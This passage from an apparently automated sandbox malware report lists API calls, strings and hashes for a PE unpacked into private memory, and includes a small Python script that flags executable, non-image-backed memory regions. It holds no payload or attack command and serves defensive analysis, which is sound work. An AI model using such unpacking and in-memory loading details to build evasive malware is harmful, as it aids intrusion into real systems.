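    return Region(
        process_index=int(m["proc"], 16),
        snapshot_index=int(m["snap"], 16),
        dump_id=int(m["dump"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        state=int(m["state"], 16),
        mem_type=int(m["type"], 16),
    )


def triage(name: str) -> str:
    """One-line verdict: executable memory that is not backed by an image file is
    where an unpacked or manually mapped PE lives."""
    r = parse_sdmp_name(name)
    flags = [r.protect_name,
             MEM_STATE.get(r.state, hex(r.state)),
             MEM_TYPE.get(r.mem_type, hex(r.mem_type))]
    verdict = ("suspicious: executable, not image-backed"
               if r.executable and not r.image_backed else "ok")
    return f"{r.base:#010x} {' '.join(flags)} -> {verdict}"


# The three dumps this report lists for the region at 0x028A0000.
REPORT_DUMPS = [
    "00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp",
    "00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in REPORT_DUMPS:
        print(triage(n))
```

Run against the three names above it reports the 028A1000 region as PAGE_EXECUTE_READ MEM_COMMIT MEM_PRIVATE, the 028A0000 page as PAGE_READONLY (the mapped PE header) and 028CB000 as PAGE_READWRITE (data), which is the layout of a PE copied into private memory rather than loaded from disk.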

APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
• Instruction ID: 1ab93f5926b48356a2c382d9e4378168de0618033a0ff84b75e5f7024526b3c7
• Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
• Instruction Fuzzy Hash: 3CE0D87D70021817E714A55C5CA09F7726DA75C710F04417EBD49C7341EEE09D408AE5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersionExA.KERNEL32(?,028CA106,00000000,028CA11E), ref: 028AB756
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: bdd8063706ace15bb6887713df2b5cd07b5cadac913393fddfe800cb073e36f9
• Instruction ID: ab363ecf34b525c6e2499b1d677ef046c44ffbb0d5b93ac4e9ee07ce2238987f
• Opcode Fuzzy Hash: bdd8063706ace15bb6887713df2b5cd07b5cadac913393fddfe800cb073e36f9
• Instruction Fuzzy Hash: 19F0B2BC944B019FE790DF28E45262577E5FB88718F248D3DE898C7380EB7498248F92
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028ABE2E,00000000,028AC047,?,?,00000000,00000000), ref: 028AA7DF
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
• Instruction ID: 675aae88e52e70492b453d27b230ccd0d226e3bf760e8ad5af0de73724a516a0
• Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
• Instruction Fuzzy Hash: 54D05E6E30E2A43AB224915E2DA4DBB5AFCCAC57A1F04443EB988C6201E6008C06D6B1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
• Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
• Instruction ID: b65c66b4548049ce115804527f489826efcdbc3eb32495d15bccc906e0659a24
• Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
• Instruction Fuzzy Hash: 12A01208404831019540371C0C0213530445800620FC8074068F8802D5FD1D012440D3
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
• Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028AD259
  • Part of subcall function 028AD224: GetProcAddress.KERNEL32(00000000), ref: 028AD23D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: 62491741b168e3ae01d2e5621cb6f8f2894e10c977a109e0c82882e47775259c
• Instruction ID: 80f433dd607f2f4b39ac727d279d194cc3e1c27db2b61fcc38365f1de655731a
• Opcode Fuzzy Hash: 62491741b168e3ae01d2e5621cb6f8f2894e10c977a109e0c82882e47775259c
• Instruction Fuzzy Hash: 1941516DA492089F73186B6D747003B77DAEB497103A5940AF614DBF08DDB0FC5ACE2A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 028B6E9A
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 028B6EAB
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 028B6EBB
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 028B6ECB
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 028B6EDB
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 028B6EEB
• GetProcAddress.KERNEL32 ref: 028B6EFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: 81398e79dc2a122ddfda1e8ffde288f303358d382ca6f471b0ad4b4de3b39f11
• Instruction ID: e886f32683aa086337ca41a267a47c077b33bdfc22944067740ebc9ec7d20e86
• Opcode Fuzzy Hash: 81398e79dc2a122ddfda1e8ffde288f303358d382ca6f471b0ad4b4de3b39f11
• Instruction Fuzzy Hash: BDF082BC9CB7746DBA016B3C1C9786A274D9E0160835C281DB066E5F47FF7884204F21
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 028BA078
• GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028BA08F
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 028BA095
• LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 028BA0A7
• IsBadReadPtr.KERNEL32(?,00000004), ref: 028BA123
• IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 028BA12F
• IsBadReadPtr.KERNEL32(?,00000014), ref: 028BA143
Strings
• LoadLibraryExA, xrefs: 028BA085
• C:\Windows\System32\KernelBase.dll, xrefs: 028BA08A
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Read$AddressHandleLibraryLoadModuleProc
• String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
• API String ID: 2083169754-1650066521
• Opcode ID: 81a76273f37c253a72937a22d548da497ea2e5ecdb719e3572e8d2f035bef4e7
• Instruction ID: e63d9a068fc35c9d9fad7090539d6eb1acd1eb024c6c207e427ebd2b1b9aa36f
• Opcode Fuzzy Hash: 81a76273f37c253a72937a22d548da497ea2e5ecdb719e3572e8d2f035bef4e7
• Instruction Fuzzy Hash: FD314D7DA40319BBEB65DF6CCC81F9A77ACAF05354F084518EA19EB381E734E9408B61
Uniqueness

Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028A28CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
• Opcode ID: 1052feadf3aa4f53380d6c95bccef69f0c6b6c13f9ad3882bc1d8b9165cfb6c8
• Instruction ID: 5adc1c687a721d3ea96f6b9ffb67fd3468c90d7a2849ed2d85071e75971a31d5
• Opcode Fuzzy Hash: 1052feadf3aa4f53380d6c95bccef69f0c6b6c13f9ad3882bc1d8b9165cfb6c8
• Instruction Fuzzy Hash: 19A1063CA042688BFB319A2CCCA0B9976E5EB09314F1441E5ED4DDB38ACF759985CF51
Uniqueness
Uniqueness Score: -1.00%

Strings
• An unexpected memory leak has occurred. , xrefs: 028A2690
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 028A2849
• , xrefs: 028A2814
• The unexpected small block leaks are:, xrefs: 028A2707
• Unexpected Memory Leak, xrefs: 028A28C0
• bytes: , xrefs: 028A275D
• 7, xrefs: 028A26A1
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
• Opcode ID: afb389735a054145ef7a3aa59289765221e050fda787fb48a6ed3c8e43f33d0e
• Instruction ID: 4e962c1a84d557b3a1c74a7f8a5624c3133be887c3086d346d3e31c657be47cf
• Opcode Fuzzy Hash: afb389735a054145ef7a3aa59289765221e050fda787fb48a6ed3c8e43f33d0e
• Instruction Fuzzy Hash: DB71E43CA042588FEB319A2CCC94BD9B6E5EB09714F1040E5E94DD7289DF754AC5CF52
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(00000000,028AC047,?,?,00000000,00000000), ref: 028ABDB2
  • Part of subcall function 028AA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 60bac495d1a8e6efb63abd73616d2ac6fbaebcb16eeaa8d93fd73ed939039d36
• Instruction ID: d848477f78b7a38c64dd53566b33ec618dc91d1b5752bb205f2ab30ed7e894d5
• Opcode Fuzzy Hash: 60bac495d1a8e6efb63abd73616d2ac6fbaebcb16eeaa8d93fd73ed939039d36
• Instruction Fuzzy Hash: 0061313CB011889BFB04EBACD8B0A9F77BB9B48300F109835D601DB745DE75D9499B96
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?,029047C8,?,?,028CB7A8,028A6575,028CA305), ref: 028A4359
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?,029047C8,?,?,028CB7A8,028A6575,028CA305), ref: 028A435F
• GetStdHandle.KERNEL32(000000F5,028A43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?,029047C8), ref: 028A4374
• WriteFile.KERNEL32(00000000,000000F5,028A43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?), ref: 028A437A
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028A4398
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 790141cd225c82ba55a746b9852e8bec553ce21a678120023ded749672928304
• Instruction ID: 510c6cfabde25cede2eef580ec3b9bb87b4f85f5ac951f3ddede33aeb2525fab
• Opcode Fuzzy Hash: 790141cd225c82ba55a746b9852e8bec553ce21a678120023ded749672928304
• Instruction Fuzzy Hash: 2EF0BB6CEC47487DFE10A3F86C6EF69275C5744B25F244629B618D50C58FF440C49B23
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028AACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028AAD15
  • Part of subcall function 028AACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028AAD39
  • Part of subcall function 028AACF8: GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028AAD54
  • Part of subcall function 028AACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028AADEA
• CharToOemA.USER32(?,?), ref: 028AAEB7
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028AAED4
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028AAEDA
• GetStdHandle.KERNEL32(000000F4,028AAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028AAEEF
• WriteFile.KERNEL32(00000000,000000F4,028AAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028AAEF5
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028AAF17
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 028AAF2D
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
• Opcode ID: 893d02a848dd77fc8226bc8296a501c1d6db71b13f6c81cbb7d090a00cb6c8ec
• Instruction ID: c90e2cc2ba0b7b1469b0ecf1947d4f199866de0a99c9c4b5f463950c12cbf1ff
• Opcode Fuzzy Hash: 893d02a848dd77fc8226bc8296a501c1d6db71b13f6c81cbb7d090a00cb6c8ec
• Instruction Fuzzy Hash: 2A114CBE5582086EF704EAACCC91F9E73EDAB44700F440A25B764D60A5EE74E9448F27
Uniqueness
Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028AE5E1
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028AE5FD
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028AE636
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028AE6B3
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028AE6CC
• VariantCopy.OLEAUT32(?,00000000), ref: 028AE701
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction ID: bd3c7274b8db48017c681746352a578103835e747e039db9b0dc7db716e13c64
• Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction Fuzzy Hash: 1E51E8BD9006299BDB22DB5CC8A0BD9B3BDAF49300F0045E5E509E7612DB70AF85CF61
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028A357E
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028A35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028A35B1
• RegCloseKey.ADVAPI32(?,028A35D4,00000000,?,00000004,00000000,028A35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028A35C7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: 700287bc617e2e13ab901f552a6bfcd6c4493e9e67fce71859f80a621ccbc873
• Instruction ID: 781fa26ee0f949a0c7e8faf771996eddcd35bb762a8c5cd91554d1e3f5c9625a
• Opcode Fuzzy Hash: 700287bc617e2e13ab901f552a6bfcd6c4493e9e67fce71859f80a621ccbc873
• Instruction Fuzzy Hash: 9B01B5BDA40318BAFB11DBD48C12BBDB3ECEB08710F1005A1BA14D7680EE789610DB55
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,028AAAA3,?,?,00000000), ref: 028AAA24
  • Part of subcall function 028AA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,028AAAA3,?,?,00000000), ref: 028AAA54
• EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 028AAA5F
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,028AAAA3,?,?,00000000), ref: 028AAA7D
• EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 028AAA88
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread$CalendarEnum
• String ID:
• API String ID: 4102113445-0
• Opcode ID: 5247ab9e33151d2c0d81f23353cf178a3a35c9c541b5dca32444f7958f26f3b2
• Instruction ID: 3a268719fe41c6df560e897cd8ea0387e2f182ef51af17589a24d18fdbb3a166
• Opcode Fuzzy Hash: 5247ab9e33151d2c0d81f23353cf178a3a35c9c541b5dca32444f7958f26f3b2
• Instruction Fuzzy Hash: 5C01247C2002146EFA05AA7CCD31B2E72FDDB45720F550120E512E6AC4EE68AE00CAA6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,028AAC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028AAAEB
  • Part of subcall function 028AA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
• Opcode ID: d8247356d74f016ec5abf525f5fc81e4b28f80be74fcafa54f188f8b635680c5
• Instruction ID: 823edad277f00b7342893cdcd99ae97e0a21bd0908da02ed3e2bbabdf95fef46
• Opcode Fuzzy Hash: d8247356d74f016ec5abf525f5fc81e4b28f80be74fcafa54f188f8b635680c5
• Instruction Fuzzy Hash: 7341E23C7045488BFB19EBAC88B027EF3BBDB85304B544525D482C7B44EE749E06DA22
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,028CA10B,00000000,028CA11E), ref: 028AC436
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028AC447
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: df5503ddebceabeb6dfb029564dfee8763a3b69788aaca8210e9d37669205651
• Instruction ID: 00178b1b9f463a67d8d8b11f6d7b163fcbae8077c705fae0577970753ba538c8
• Opcode Fuzzy Hash: df5503ddebceabeb6dfb029564dfee8763a3b69788aaca8210e9d37669205651
• Instruction Fuzzy Hash: AAD0A77CA867154EFF00AAF954B273523D8C70474AF14D82AE101D5245EFB584148F5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028AE253
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028AE26F
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028AE2E6
• VariantClear.OLEAUT32(?), ref: 028AE30F
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
• Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction ID: 08197bb054beef870993ee7436ef5bde365a5322f7453eb16e4abce6c27f3e04
• Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction Fuzzy Hash: E041F77DA006299FEB62DB58C8A0BC9B3BDAB48304F0045E5E64CE7611DF34AF818F51
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 028AAD15
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028AAD39
• GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028AAD54
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028AADEA
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
